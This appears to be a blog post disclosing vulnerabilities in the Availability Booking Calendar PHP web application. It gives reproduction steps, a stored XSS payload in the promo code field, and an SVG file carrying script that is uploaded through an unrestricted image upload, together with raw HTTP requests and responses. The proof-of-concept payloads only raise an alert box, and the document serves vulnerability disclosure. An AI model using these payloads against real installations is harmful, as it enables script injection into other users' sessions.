Saturday 22 July 2023

Full Disclosure - Availability Booking Calendar PHP

Application

  • Availability Booking Calendar PHP


Information 

  • Input not validated 
  • Stored Cross Site Scripting flaw 
  • Unrestricted File Upload


Exploit 


XSS #1:

Steps to Reproduce:

1. Browse to Bookings
2. Select All Bookings
3. Edit booking and select Promo Code
4. Enter payload TEST"><script>alert(`XSS`)</script>


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
edit_booking=1&calendars_price=900&extra_price=0&tax=10&deposit=91&promo_code=TEST%22%3E%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E&discount=0&total=910&create_booking=1
[...]

// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 205
[...]



// HTTP GET request to Bookings page

GET /AvailabilityBookingCalendarPHP/index.php?controller=GzBooking&action=edit&id=2 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 33590
[...]

[...]
<label class="control-label" for="promo_code">Promo code:</label>
            <input id="promo_code" class="form-control input-sm" type="text" name="promo_code" size="25" value=TEST"><script>alert(`XSS`)</script>" title="Promo code" placeholder="">
        </div>
[...]



Unrestricted File Upload #1:


// SVG file contents

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>


Steps to Reproduce:

1. Browse My Account
2. Image Browse -> Upload
3. Then right click on image
4. Select Open Image in New Tab


// HTTP POST request

POST /AvailabilityBookingCalendarPHP/index.php?controller=GzUser&action=edit&id=1 HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

[...]
-----------------------------13831219578609189241212424546
Content-Disposition: form-data; name="img"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(`XSS`);
   </script>
</svg>
[...]


// HTTP response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 190
[...]

at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...